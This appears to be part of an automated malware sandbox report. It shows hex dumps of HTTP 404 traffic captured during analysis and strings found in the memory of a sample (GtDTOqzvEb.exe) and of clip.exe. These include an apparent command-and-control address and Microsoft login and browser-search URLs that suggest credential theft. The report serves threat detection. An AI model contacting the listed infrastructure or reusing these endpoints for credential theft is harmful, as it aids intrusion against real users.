3f 2c ef 47 f0 b4 b1 89 f7 8c c6 6f a7 a8 32 b1 98 85 61 27 b0 a9 11 a5 6b e3 e8 35 71 dc f2 15 6f a5 bd 16 13 c7 f0 b9 29 24 9c 2a 2e 6b 27 52 db c8 fb 8b 4a a5 4e 68 d5 17 81 0d 74 90 07 26 e0 41 31 78 10 53 d6 1a 6c f1 d7 f3 5b 4c 1d 9b 25 66 24 a6 66 96 f8 bf c7 c7 ad fd e0 a1 0b b6 ef 15 d1 3f 49 fb 78 7c 9c ce 06 51 59 d9 65 9f 9b bc 2a 88 2e 76 f0 14 34 4a 99 0c 7f 57 b8 86 4f dc 61 7f 30 e2 09 55 d8 20 6d ce 25 7a 60 5f 0f 82 ee d0 82 74 39 ba 4e 61 cf ea ef 3c bf 22 36 12 64 7a 38 1b f1 88 db 5a a5 c9 90 56 d6 a4 49 3e 2a a2 92 1b 82 5e e9 0c 23 a1 88 27 ee 0c 17 da 60 df a7 d7 9d fa 34 
e8 af 85 ca f4 3a c8 74 da c4 16 b0 b6 6c 2c 20 5a ac d7 eb 8e 7e 21 df 54 a1 65 c6 76 77 6b 09 99 73 36 18 bd e9 ce cc 79 9f b5 59 b0 00 d8 cd 69 78 f4 6e 78 74 4c bf f0 bd 17 f0 ca 69 8f de 81 89 64 8d 42 69 55 17 e2 5f bc 28 69 eb 4c 85 2f 50 2a f3 b0 92 da d7 37 20 ad 1f 9e 1b 9d 34 46 94 d3 68 73 e3 e7 d4 df bf bc 75 e2 53 93 65 33 21 e2 cd 88 18 cf 75 56 77 94 ca c4 0a 52 49 1d 90 b0 79 1e 4a 9d 6b 36 19 c7 24 7d ad 6f f8 2b 45 be 74 a1 e7 1e db 12 7d 0f 93 6a 79 c4 76 9c 1f 2f 87 13 f8 72 fa f9 1c ae ae bf c3 9f d7 37 57 9f 22 8a 63 b8 87 28 27 67 95 03 6a a0 5a 57 cc 90 03 ad 7d 6b 82 d3 30 af 84 cc bc dc 80 5e 2b 58 e3 dc 0a 87 01 c5 6f e2 89 87 af 90 26 53 81 1e eb 96 08 c6 c7 06 a5 e4 29 92 97 72 df 49 17 5f 6f 5e 39 a7 95 ed ed 74 a4 e5 db 0a 34 5a c8 b8 b9 0b e7 39 7b 31 a6 3c 4b 5e 4c 8e 0f 95 2b 7e 58 0a 30 c5 84 c6 c7 6f 7e 5b 60 26 aa 22 11 34 31 0d 5d 46 23 Data Ascii: 412VKo8WL}X= "iEMR`-e&%);$CI~$a/E|yKWytI|9Rq'T.qBZx
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 11 Jan 2025 05:32:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 2088Connection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Request-Id: 49fe5fcdb0b6c214c609b440749161a5X-Runtime: 0.039283Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 79 6c 65 73 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 77 69 64 65 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 36 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 0a 20 20 20 20 28 66 75 6e 63 74 
69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 61 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 20 20 20 20 20 20 6d 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 61 2e 61 73 79 6e 63 3d 31 3b 61 2e 73 72 63 3d 67 3b 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 0a 20 20 20 20 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 05:32:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 05:32:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 05:33:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 
a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 05:33:03 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 
20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 05:33:36 GMT
Server: Apache
Content-Length: 774
Connection: close
Content-Type: text/html
Data Ascii (774 bytes, full decoding of Data Raw):
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>404 Not Found</title>
    <link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet">
    <link type="text/css" rel="stylesheet" href="/css/style404.css" />
</head>
<body>
    <div id="notfound">
        <div class="notfound">
            <div class="notfound-404">
                <h1>4<span>0</span>4</h1>
            </div>
            <h2>the page you requested could not found</h2>
            <form class="notfound-search">
                <input type="text" placeholder="Search...">
                <button type="button"><span></span></button>
            </form>
        </div>
    </div>
</body>
</html>
Source: GtDTOqzvEb.exe, 00000008.00000002.3285172725.0000000004A9E000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.astrafusion.xyz
Source: GtDTOqzvEb.exe, 00000008.00000002.3285172725.0000000004A9E000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.astrafusion.xyz/pcck/
Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: clip.exe, 00000005.00000002.3284516753.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.0000000003674000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: clip.exe, 00000005.00000002.3284516753.00000000056CE000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.00000000031BE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat
Source: clip.exe, 00000005.00000002.3281277788.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: clip.exe, 00000005.00000002.3281277788.00000000006C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: clip.exe, 00000005.00000003.2097053025.000000000757A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: clip.exe, 00000005.00000002.3281277788.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
